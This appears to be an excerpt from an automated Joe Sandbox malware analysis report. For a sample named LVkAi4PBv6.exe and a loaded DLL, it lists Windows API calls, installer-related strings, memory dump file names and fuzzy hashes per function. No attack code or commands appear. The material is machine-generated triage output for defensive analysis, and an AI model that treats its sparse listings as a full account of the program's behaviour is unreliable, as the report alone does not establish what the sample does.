                                                                                                                                                                                                                                                                                                  • Instruction ID: e25328658eb2af5c797129f02c530469f9bd34b085cc16a4f2b792e38ba7c2b3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 682c91fefa945d708f54360bd219247fba3a377a715970133441602dbde4d164
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8219031104105BFDB25AFA8DC4EE6B3F66FF85350F14861AFA0AAA2A4C731DD50DB51
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 005E0B27
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 005E0B31
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Invalid seek type., xrefs: 005E0ABD
                                                                                                                                                                                                                                                                                                  • Failed to move file pointer 0x%x bytes., xrefs: 005E0B62
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 005E0B55
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                                                  • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2976181284-417918914
                                                                                                                                                                                                                                                                                                  • Opcode ID: ff8d9a664d7ca1e151d57a736b049bee71b2a7158b1986cb72b514ab75ed0da8
                                                                                                                                                                                                                                                                                                  • Instruction ID: f371bd6b4d9876b8568e400254e1b1ec2abee370f7f4dd2de7977645fd080186
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff8d9a664d7ca1e151d57a736b049bee71b2a7158b1986cb72b514ab75ed0da8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1931E832A4025AEFCB18CF99CC44EAEBB79FF04724B048625FD5497290D370ED508B90
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,005DA0E8,00000000,00000000,?,00000000,005C53BD,00000000,?,?,005CD5B5,?), ref: 005C4123
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005DA0E8,00000000,00000000,?,00000000,005C53BD,00000000,?,?,005CD5B5,?,00000000,00000000), ref: 005C4131
                                                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,840F01E8,005C5489,?,005DA0E8,00000000,00000000,?,00000000,005C53BD,00000000,?,?,005CD5B5,?,00000000), ref: 005C419A
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005DA0E8,00000000,00000000,?,00000000,005C53BD,00000000,?,?,005CD5B5,?,00000000,00000000), ref: 005C41A4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: dirutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1375471231-2193988115
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1366715162.000000006D361000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D360000, based on PE: true
• Associated: 00000002.00000002.1366691686.000000006D360000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1366762621.000000006D38A000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1366786381.000000006D39B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1366806926.000000006D39D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6d360000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3136044242-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32 ref: 6D366F0A
                                                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,00000104), ref: 6D366F22
                                                                                                                                                                                                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 6D366FB7
                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE ref: 6D366FC3
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 6D366FCA
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1366715162.000000006D361000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D360000, based on PE: true
• Associated: 00000002.00000002.1366691686.000000006D360000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1366762621.000000006D38A000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1366786381.000000006D39B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1366806926.000000006D39D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6d360000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ModuleProcess$CreateExitFileHandleNameSleep
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1732164044-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00600F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0062AAA0,00000000,?,006057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00600F80
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,005D3FB5,feclient.dll,?,00000000,?,?,?,005C4B12), ref: 005D3B42
                                                                                                                                                                                                                                                                                                    • Part of subcall function 006010B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0060112B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 006010B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00601163
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                                                                                                                                                                                                  • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 1586453840-3596319545
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(005E12CF,00000000,00000000,?,?,?,00600013,005E12CF,005E12CF,?,00000000,0000FDE9,?,005E12CF,8007139F,Invalid operation for this state.), ref: 00600776
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(00000200,00000000,00000000,?,00000000,?,?,00600013,005E12CF,005E12CF,?,00000000,0000FDE9,?,005E12CF,8007139F), ref: 006007B2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00600013,005E12CF,005E12CF,?,00000000,0000FDE9,?,005E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 006007BC
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWritelstrlen
                                                                                                                                                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 606256338-3545173039
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • FormatMessageW.KERNELBASE(00000900,?,?,00000000,00000000,00000000,?,00000000,?,?,006004F4,?,?,?,?,00000001), ref: 005FFE40
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,006004F4,?,?,?,?,00000001,?,005C5616,?,?,00000000,?,?,005C5395,00000002), ref: 005FFE4C
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,00000000,?,?,006004F4,?,?,?,?,00000001,?,005C5616,?,?), ref: 005FFEB5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1365068426-3545173039
                                                                                                                                                                                                                                                                                                  • Opcode ID: a171bdf2d6550371712ea8c72118a291c3b1b451c4f47fb4d59355a2a7121e19
                                                                                                                                                                                                                                                                                                  • Instruction ID: dd1475b3d3d265509be8684c9d81e29e1d50e753a92e424c94a8ad59367c1909
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a171bdf2d6550371712ea8c72118a291c3b1b451c4f47fb4d59355a2a7121e19
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F115B32A4012EEBDB319F949D05EBF7E6AFF54710F018069FF0596561D7358A20D7A0
APIs
  • Part of subcall function 005E140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,005E0A19,?,?,?), ref: 005E1434
  • Part of subcall function 005E140C: GetLastError.KERNEL32(?,005E0A19,?,?,?), ref: 005E143E
• ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 005E0A27
• GetLastError.KERNEL32 ref: 005E0A31
Strings
• Failed to read during cabinet extraction., xrefs: 005E0A5F
• cabextract.cpp, xrefs: 005E0A55
Memory Dump Source
• Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
Similarity
• API ID: ErrorFileLast$PointerRead
• String ID: Failed to read during cabinet extraction.$cabextract.cpp
• API String ID: 2170121939-2426083571
• Opcode ID: d7ff2f0024c1f9218279907c616fa63c9146abed602bad1a758b6d2479a9a114
• Instruction ID: 8e980174e6f75065e9279936ab38f0011395fd6b568a3c39570d55f3364be258
• Opcode Fuzzy Hash: d7ff2f0024c1f9218279907c616fa63c9146abed602bad1a758b6d2479a9a114
• Instruction Fuzzy Hash: 0011E137A4166ABBCB259F96DC08E9F7F6AFF08760B014169FD04A7290C7309910D7D4
APIs
• SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,005E0A19,?,?,?), ref: 005E1434
• GetLastError.KERNEL32(?,005E0A19,?,?,?), ref: 005E143E
Strings
• Failed to move to virtual file pointer., xrefs: 005E146C
• cabextract.cpp, xrefs: 005E1462
Memory Dump Source
• Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID: Failed to move to virtual file pointer.$cabextract.cpp
• API String ID: 2976181284-3005670968
• Opcode ID: 82870e92ab3eda210f4665b46a1a65d28151c19ca345879c5252a16813a5100e
• Instruction ID: c67f5a98210d8844fbd5758b33afd0d516b94966c684634f4a0bb35d26206bb5
• Opcode Fuzzy Hash: 82870e92ab3eda210f4665b46a1a65d28151c19ca345879c5252a16813a5100e
• Instruction Fuzzy Hash: 3601F233941A3ABBCB254A968C08E8BFF26FF40770712C129FD585A291DB319C10C6D8
APIs
• SetEvent.KERNEL32(0060B478,00000000,?,005E1717,?,00000000,?,005CC287,?,005C5405,?,005D75A5,?,?,005C5405,?), ref: 005E07BF
• GetLastError.KERNEL32(?,005E1717,?,00000000,?,005CC287,?,005C5405,?,005D75A5,?,?,005C5405,?,005C5445,00000001), ref: 005E07C9
Strings
• Failed to set begin operation event., xrefs: 005E07F7
• cabextract.cpp, xrefs: 005E07ED
Memory Dump Source
• Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
Similarity
• API ID: ErrorEventLast
• String ID: Failed to set begin operation event.$cabextract.cpp
• API String ID: 3848097054-4159625223
• Opcode ID: f85099190a590df71e6d1d0b327867c188f858b1688151df668567167e90fef6
• Instruction ID: ca2543d5716dea9051691fd910ca7620839488d91ab015717020b91793e0da6f
• Opcode Fuzzy Hash: f85099190a590df71e6d1d0b327867c188f858b1688151df668567167e90fef6
• Instruction Fuzzy Hash: E6F05C3398367267D32816D64C09B8F7E85FF04B70B025129FE41BB2C0E650AC80C2D9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1366715162.000000006D361000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D360000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366691686.000000006D360000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366762621.000000006D38A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366786381.000000006D39B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366806926.000000006D39D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6d360000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                  • API String ID: 0-507524227
                                                                                                                                                                                                                                                                                                  • Opcode ID: dab5dc608078a78137920006fbf3a08574d8635870744fadcf9ae32b619a45e6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 95164705e8455ba5f7d09a089badc106a6a0030e862bc05a7c842c05597f74b9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dab5dc608078a78137920006fbf3a08574d8635870744fadcf9ae32b619a45e6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC4195B1E04A15AFCB32CF9DC8819AEBBBCEB85314F114066E644D7200E7759A41CB54
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,005C1104,?,?,00000000), ref: 005C5142
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,005C1104,?,?,00000000), ref: 005C5172
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareStringlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: burn.clean.room
                                                                                                                                                                                                                                                                                                  • API String ID: 1433953587-3055529264
                                                                                                                                                                                                                                                                                                  • Opcode ID: fa74cb198936ea409cc26ab22275e8a024bceb401ed1c0971c7d19b4b393498f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 721e07b1a22f8da84e407852820e007105f8832f4c7d43e0d1e1e22758cd3a1b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa74cb198936ea409cc26ab22275e8a024bceb401ed1c0971c7d19b4b393498f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64018672900A246F87344BC99D88F73BFBEFB15760B14911AF545C3610E7B0AC81C7A1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C3877
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C3881
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 005C38EA
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DirectoryErrorLastLibraryLoadSystem
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1230559179-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 77608922ac898089e8ec84429a71816f295732109872135186878293d1e9b3f9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4dde8119bc8188e38cb829dbd80dc66dbdfd3333156cb7a662c069545f6aee50
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77608922ac898089e8ec84429a71816f295732109872135186878293d1e9b3f9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8021B6B2D0123E6BDB209FA59C49F9B7B68BB44710F1185A9BD14E7241DA70DE4487D0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,005C3BB6,00000000,?,005C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,005C13B8), ref: 005C3A20
                                                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?,005C3BB6,00000000,?,005C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,005C13B8,000001C7,00000100), ref: 005C3A27
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005C3BB6,00000000,?,005C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,005C13B8,000001C7,00000100,?), ref: 005C3A31
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$ErrorFreeLastProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 406640338-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 24321c39a61cce7db564aca79e8d7ec18d1cf959d5a6e7858e6502d2cd0437ff
                                                                                                                                                                                                                                                                                                  • Instruction ID: 70821bdafd0a16906f0e92e3d5345d67edbce0ed07cae71f14e510769598c4da
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24321c39a61cce7db564aca79e8d7ec18d1cf959d5a6e7858e6502d2cd0437ff
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2D0C233A801395BC32017E65C0CA5B7F58EF04AA1701A024FD44D6220D721CC1082E4
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00600F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0062AAA0,00000000,?,006057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00600F80
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,005D7D59,?,?,?), ref: 005CF7B9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00601026: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000000,?,00000000,?,?,?,005CF78E,00000000,Installed,00000000,?), ref: 0060104B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                  • String ID: Installed
                                                                                                                                                                                                                                                                                                  • API String ID: 3677997916-3662710971
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0062AAA0,00000000,?,006057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00600F80
                                                                                                                                                                                                                                                                                                  Strings
